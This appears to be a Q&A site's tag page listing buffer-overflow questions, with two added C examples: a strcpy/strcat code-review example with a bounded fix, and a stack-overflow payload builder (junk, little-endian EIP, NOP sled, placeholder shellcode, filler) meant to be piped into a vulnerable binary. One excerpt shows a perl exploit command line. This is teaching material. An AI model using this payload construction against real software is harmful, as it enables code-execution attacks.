Questions tagged [buffer-overflow]
A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory.
513 questions
3 votes · 1 answer · 1k views
Buffer overflow: How is it actually implemented in a pen testing environment?
Background:
So when exploiting a Buffer Overflow vulnerability, the attacker needs to
not only generate the payload (Let's say to create a binding shell), but also set up the corrupted buffer with ...
3 votes · 1 answer · 8k views
Buffer overflow: Why does the ESP Register change its value after access violation
Background: Currently trying to exploit a BoF vulnerability. After setting up the environment, running a compiled C program that contains the strcpy function, I disassembled the program as it's ...
6 votes · 1 answer · 581 views
How do I organize my input for a buffer overflow?
I have a 32 bit linux binary that is susceptible to a buffer overflow. I figured out I need to input 1040 bytes before I can control the EIP register.
I have a shellcode size of 28 bytes. How do I ...
2 votes · 2 answers · 4k views
Shellcode doesn't execute and EIP is overwritten
I've written a vulnerable program (below) and some shellcode (also below) to use in a buffer overflow exploit. I've had the same problems as in this link, and solved those using the answers there (-z ...
2 votes · 1 answer · 2k views
Trying to buffer overflow a simple C program
I'm having a problem buffer-overflowing a simple C program that takes input from the command line. This is the main.c code:
#include <stdio.h>
#include <string.h>
void func(char *name)
{
...
19 votes · 5 answers · 6k views
Is it possible to find a buffer overflow in WordPress?
I had an interesting conversation with a pentester who told me he had found a buffer overflow in WordPress. The person in question was really adamant that this was true. The client is a bit skeptical ...
-2 votes · 2 answers · 5k views
Why do we use little endian in buffer overflow attacks? [closed]
Why in buffer overflow attacks do we reverse the address? Why do we use little endian format?
1 vote · 2 answers · 7k views
Buffer overflow due to strlen, strcpy, strcat
I'm new to secure code review. I know that strlen calculates the length until it finds a null character. This is a part of a larger piece of code.
char* executeMount(char* password, char* path, int ...
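The question above is about spotting the strlen/strcpy/strcat pattern during code review. The following C program is an added example, not the code from the question or its answers: it shows the unsafe pattern (fixed-size buffer, strcpy and strcat with no size check) next to a bounded version, and why strlen on its own is not a safety check. The function names (build_mount_cmd_unsafe, build_mount_cmd_safe), the CMD_MAX size, the "mount -o ro " prefix and the sample paths are hypothetical.

```c
/* Added example, not the code from the question: the strlen/strcpy/strcat
 * pattern a code reviewer looks for, and a bounded version next to it.
 * Names (build_mount_cmd_unsafe, build_mount_cmd_safe, CMD_MAX), the
 * command prefix and the sample paths are hypothetical. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CMD_MAX 64                      /* fixed on-stack buffer size */
static const char PREFIX[] = "mount -o ro ";

/* strlen stops at the first NUL, so it tells you how long the input is,
 * not whether it fits.  The review question is whether the bytes needed
 * (prefix + path + terminating NUL) can exceed the destination size. */
size_t bytes_needed(const char *path)
{
    return strlen(PREFIX) + strlen(path) + 1;
}

int fits(const char *path, size_t cap)
{
    return bytes_needed(path) <= cap;
}

/* Vulnerable pattern: strcpy/strcat copy until NUL regardless of the
 * destination size.  A path longer than CMD_MAX - 13 bytes overwrites
 * whatever follows cmd on the stack (saved registers, return address). */
void build_mount_cmd_unsafe(char cmd[CMD_MAX], const char *path)
{
    strcpy(cmd, PREFIX);
    strcat(cmd, path);
}

/* Length of s without scanning past max bytes.  Guards the case where the
 * argument is a fixed-size field that may not be NUL-terminated, which
 * would make plain strlen read out of bounds. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Bounded version: refuse input that is unterminated or does not fit.
 * snprintf never writes past cap and returns the length it wanted, so a
 * return value >= cap means the command would have been truncated; a
 * truncated mount command must not be executed, so that is an error too.
 * Returns 0 on success, -1 on rejection (cmd is then unspecified). */
int build_mount_cmd_safe(char *cmd, size_t cap, const char *path, size_t path_max)
{
    size_t plen = bounded_len(path, path_max);
    if (plen == path_max) return -1;             /* no NUL within path_max */
    int n = snprintf(cmd, cap, "%s%.*s", PREFIX, (int)plen, path);
    if (n < 0 || (size_t)n >= cap) return -1;    /* would not fit */
    return 0;
}

/* Exercises both versions with a short path, a long path and an
 * unterminated field.  Returns 1 when the safe version accepts the first,
 * rejects the other two, and the unsafe version would have needed more than
 * CMD_MAX bytes for the long path. */
int mount_cmd_selfcheck(void)
{
    char cmd[CMD_MAX];
    char longpath[80];
    char unterminated[4] = { 'a', 'b', 'c', 'd' };   /* no NUL inside bound */
    memset(longpath, 'a', sizeof longpath - 1);
    longpath[sizeof longpath - 1] = '\0';

    if (build_mount_cmd_safe(cmd, sizeof cmd, "/mnt/usb", 256) != 0) return 0;
    if (strcmp(cmd, "mount -o ro /mnt/usb") != 0) return 0;
    build_mount_cmd_unsafe(cmd, "/mnt/usb");          /* fits: 21 bytes */
    if (strcmp(cmd, "mount -o ro /mnt/usb") != 0) return 0;

    if (fits(longpath, CMD_MAX)) return 0;            /* 12 + 79 + 1 > 64 */
    if (build_mount_cmd_safe(cmd, sizeof cmd, longpath, 256) != -1) return 0;
    /* build_mount_cmd_unsafe(cmd, longpath) would overflow here; not called */

    if (build_mount_cmd_safe(cmd, sizeof cmd, unterminated, 4) != -1) return 0;
    return 1;
}
```

When reviewing, the thing to trace is the destination size against the longest string every strcpy/strcat call can be handed; strlen in the surrounding code usually feeds a malloc or a comparison and is not a bound on the copy unless the result is actually checked against the buffer size before the copy.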
1 vote · 1 answer · 1k views
Buffer overflow example on 64-bit Linux
I am attempting to learn about buffer overflows. I have written a simple C program that calls a function called checkpw() which allocates a char array 10 bytes large. When I analyze the op code I ...
1 vote · 1 answer · 2k views
Why do registers get overwritten upon overflow?
I know that upon an overflow, the stack gets partially overwritten, but I do not understand why registers such as EIP or RIP get changed in this process.
How come some registers are modified by such ...
2 votes · 1 answer · 579 views
control flow (buffer overflow) (introductory question)
I'm looking at the following code and am trying to figure out how this bug would be helpful for something like launching a shell.
int func(int i, double *data1, double data2)
{
double *p = data1; ...
0 votes · 1 answer · 641 views
Buffer overflow, SIGV fault at wrong address
I'm trying to understand why my buffer overflow will not work. I've been struggling with this for a few days now, so I thought it was about time to ask professionals. I've only recently begun to understand ...
0 votes · 1 answer · 298 views
Is a filler needed in a buffer overflow exploit?
Why do I see a filler being used in some exploits?
Take as an example the code below:
exploit = junk + eip + nops + shellcode
fill = "\x43"*(BUF_SIZE-len(exploit))
buf = exploit + fill
I guess the ...
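The questions "How do I organize my input for a buffer overflow?", "Why do we use little endian in buffer overflow attacks?" and "Is a filler needed in a buffer overflow exploit?" all describe the same payload layout. The following C program is an added example (not code from any of those questions or their answers) that builds it: junk up to the saved EIP, the return address in little-endian byte order, a NOP sled, the shellcode, and filler up to a fixed record size. The 1040-byte offset and 28-byte shellcode size come from the first question; the return address 0xbffff5c0, the 1200-byte record, the 32-byte sled and the 0x43 filler byte are assumed for illustration, and the "shellcode" is 28 bytes of int3 (0xCC) placeholder, not a working payload.

```c
/* Added example, not code from any question above: how the pieces of a
 * classic stack-overflow payload are laid out and why the saved return
 * address is written byte-reversed on x86.  Numbers are taken from the
 * questions (1040 bytes to EIP, 28-byte shellcode) or assumed for
 * illustration (return address 0xbffff5c0, record size 1200, filler 0x43).
 * The "shellcode" is 28 bytes of 0xCC (int3), a placeholder, not a payload. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define NOP 0x90u

/* x86 is little-endian: the CPU loads the saved EIP with the least
 * significant byte at the lowest address, so 0xbffff5c0 must be stored
 * as c0 f5 ff bf.  That is the whole reason exploits "reverse" addresses. */
static void put_le32(uint8_t *dst, uint32_t v)
{
    dst[0] = (uint8_t)(v & 0xff);
    dst[1] = (uint8_t)((v >> 8) & 0xff);
    dst[2] = (uint8_t)((v >> 16) & 0xff);
    dst[3] = (uint8_t)((v >> 24) & 0xff);
}

/* First address of the NOP sled when the buffer starts at buf_addr: the
 * sled follows the 4-byte overwritten return address, so any guess inside
 * [sled_start, sled_start + nop_count) slides into the shellcode. */
uint32_t sled_start(uint32_t buf_addr, size_t offset_to_eip)
{
    return buf_addr + (uint32_t)offset_to_eip + 4u;
}

/* Layout: [junk to saved EIP][EIP, little-endian][NOP sled][shellcode][filler].
 * Fills out up to cap bytes and returns cap, or 0 if the pieces do not fit.
 * The filler exists because many targets read a fixed-size record; padding
 * to that size keeps every offset identical from run to run. */
size_t build_payload(uint8_t *out, size_t cap,
                     size_t offset_to_eip, uint32_t ret_addr, size_t nop_count,
                     const uint8_t *shellcode, size_t sc_len, uint8_t filler)
{
    size_t need = offset_to_eip + 4 + nop_count + sc_len;
    size_t pos = 0;
    if (sc_len == 0 || need > cap) return 0;
    memset(out + pos, 'A', offset_to_eip); pos += offset_to_eip; /* junk */
    put_le32(out + pos, ret_addr);         pos += 4;             /* eip  */
    memset(out + pos, NOP, nop_count);     pos += nop_count;     /* nops */
    memcpy(out + pos, shellcode, sc_len);  pos += sc_len;        /* code */
    memset(out + pos, filler, cap - pos);                        /* fill */
    return cap;
}

/* Builds the payload with the question's numbers and checks every region.
 * Returns 1 when the layout is right, 0 otherwise. */
int payload_selfcheck(void)
{
    uint8_t sc[28], buf[1200];
    memset(sc, 0xCC, sizeof sc);
    if (build_payload(buf, sizeof buf, 1040, 0xbffff5c0u, 32, sc, sizeof sc, 0x43) != sizeof buf)
        return 0;
    if (buf[0] != 'A' || buf[1039] != 'A') return 0;                    /* junk */
    if (buf[1040] != 0xc0 || buf[1041] != 0xf5 ||
        buf[1042] != 0xff || buf[1043] != 0xbf) return 0;               /* eip reversed */
    if (buf[1044] != NOP || buf[1075] != NOP) return 0;                 /* sled */
    if (buf[1076] != 0xCC || buf[1103] != 0xCC) return 0;               /* shellcode */
    if (buf[1104] != 0x43 || buf[1199] != 0x43) return 0;               /* filler */
    /* a record too small for the pieces must be refused, not truncated */
    if (build_payload(buf, 1100, 1040, 0xbffff5c0u, 32, sc, sizeof sc, 0x43) != 0) return 0;
    return 1;
}

/* Emit the raw record on stdout, e.g.  ./payload | ./vuln  */
int main(void)
{
    uint8_t sc[28], buf[1200];
    memset(sc, 0xCC, sizeof sc);
    size_t n = build_payload(buf, sizeof buf, 1040, 0xbffff5c0u, 32, sc, sizeof sc, 0x43);
    if (n == 0) return 1;
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

The return address is chosen to land somewhere inside the sled (sled_start gives its first byte for a known buffer address), which is what makes a small error in the guessed stack address survivable. The same layout applies on x86-64 with an 8-byte little-endian RIP; since canonical user-space addresses there have their top two bytes zero, the payload usually cannot carry anything after the address when the copy stops at NUL.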
7 votes · 1 answer · 3k views
Identifying vulnerabilities in simple program with malloc
My class is without a textbook, or any structured learning material for that matter. I am doing all my learning through googling and while I am picking it up as I am doing it, it is slow going to be ...
0 votes · 2 answers · 1k views
Is arbitrary code execution possible using GOT overwrite with W^X enabled?
Is it possible to reliably execute arbitrary code from a single overwrite of the Global Offset Table when W^X is enabled? By "reliably" I mean assuming I control only the location pointed to by the ...
6 votes · 2 answers · 2k views
How to Check Compilation Options For SO File - Android Application VA
During the security assessment of Android applications, I have encountered multiple instances where .so (Shared Objects) files are present in lib directory.
What can be possible security test cases ...
1 vote · 1 answer · 2k views
Buffer overflow - jmp esp. Do I need a NOP sled? Does call esp also work?
I'm learning about stack buffer overflows and I'd appreciate help.
I'm exploiting a simple web server containing this log function. Argument s1 is the input that I supply via HTTP. The server is running on ...
6 votes · 2 answers · 47k views
Return to libc - finding libc's address and finding offsets
So I tried performing a return-to-libc according to https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ .
I found libc's address by using "ldd vuln", and found system's ...
3 votes · 2 answers · 7k views
Cannot overwrite EIP in basic exploitation example
I'm trying to replicate a simple buffer overflow for which I have the following code (strcpy_ex.c):
#include <string.h>
int main( int argc, char** argv ) {
char buffer[500];
...
1 vote · 0 answers · 308 views
ROP chain. Somehow two bytes are overwritten
I am learning about ROP chains. I am facing a behavior I cannot explain.
This is my sample code:
int main(int argc, char* args[]) {
char text[200];
scanf("%s", text);
return 0;
}
I ...
9 votes · 2 answers · 1k views
Trouble building a ROP chain
I am trying to exploit a small program. The program looks somewhat like this:
int func(void) {
char text[100];
scanf("%s", text);
return 0;
}
int foo(unsigned short rand) {
char ...
2 votes · 1 answer · 3k views
Buffer Overflow memory address calculation on 64-bit
I have an assignment where I must exploit a buffer overflow vulnerability on a remote machine. I have only execute permission on the program, so I can't use gdb. I managed to take control of the rip and ...
2 votes · 2 answers · 554 views
Can OSSEC detect buffer overflow attacks?
I am trying to detect buffer overflow by using OSSEC (a HIDS software) as mentioned in OSSEC rules example and OSSEC book.
How can I configure OSSEC to detect a simple buffer overflow example such as the ...
1 vote · 2 answers · 2k views
Buffer Overflow Basic
I am currently working on a buffer overflow using my own program to learn the very basics. I have already successfully executed functions already present in the code by overwriting RIP/EIP, but right ...
0 votes · 1 answer · 2k views
Setting a return address in a simple C exploit
I have a vulnerable program exploitable through the cmdline:
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
...